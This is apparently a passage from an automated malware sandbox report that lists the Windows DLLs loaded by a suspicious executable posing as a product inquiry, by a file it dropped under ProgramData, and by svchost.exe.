              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: userenv.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: propsys.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: version.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: wldp.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: profapi.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: riched20.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: usp10.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: msls31.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: wininet.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: wldp.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: profapi.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: netutils.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: winmm.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: userenv.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: propsys.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: version.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: wldp.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: profapi.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: riched20.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: usp10.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: msls31.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: version.dll
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: wininet.dll
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: edgegdi.dll
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: windows.storage.dll
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: wldp.dll
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: cryptsp.dll
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: rsaenh.dll
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: cryptbase.dll
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: pstorec.dll
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: vaultcli.dll
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: wintypes.dll
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: dpapi.dll
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: msasn1.dll
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: edgegdi.dll
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: windows.storage.dll
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: wldp.dll
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: pstorec.dll
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: sspicli.dll
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: msasn1.dll
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: msasn1.dll
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: edgegdi.dll
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: windows.storage.dll
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: wldp.dll
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: msasn1.dll
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: sspicli.dll
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: cryptsp.dll
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: rsaenh.dll
              Source: C:\ProgramData\Vexplo\Vexploio.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edgegdi.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dwmapi.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: oleacc.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: shfolder.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textshaping.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textinputframework.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coreuicomponents.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edgegdi.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dwmapi.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: oleacc.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: shfolder.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textshaping.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textinputframework.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coreuicomponents.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edgegdi.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dwmapi.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: oleacc.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: shfolder.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textshaping.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textinputframework.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coreuicomponents.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edgegdi.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dwmapi.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: oleacc.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: shfolder.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textshaping.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textinputframework.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coreuicomponents.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edgegdi.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dwmapi.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: oleacc.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: shfolder.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textshaping.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textinputframework.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coreuicomponents.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edgegdi.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dwmapi.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: oleacc.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: shfolder.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textshaping.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textinputframework.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coreuicomponents.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edgegdi.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dwmapi.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: oleacc.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: shfolder.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textshaping.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textinputframework.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coreuicomponents.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edgegdi.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dwmapi.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: oleacc.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: shfolder.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textshaping.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textinputframework.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coreuicomponents.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edgegdi.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dwmapi.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: oleacc.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: shfolder.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textshaping.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textinputframework.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coreuicomponents.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edgegdi.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dwmapi.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: oleacc.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: shfolder.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textshaping.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textinputframework.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coreuicomponents.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edgegdi.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dwmapi.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: oleacc.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: shfolder.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dll
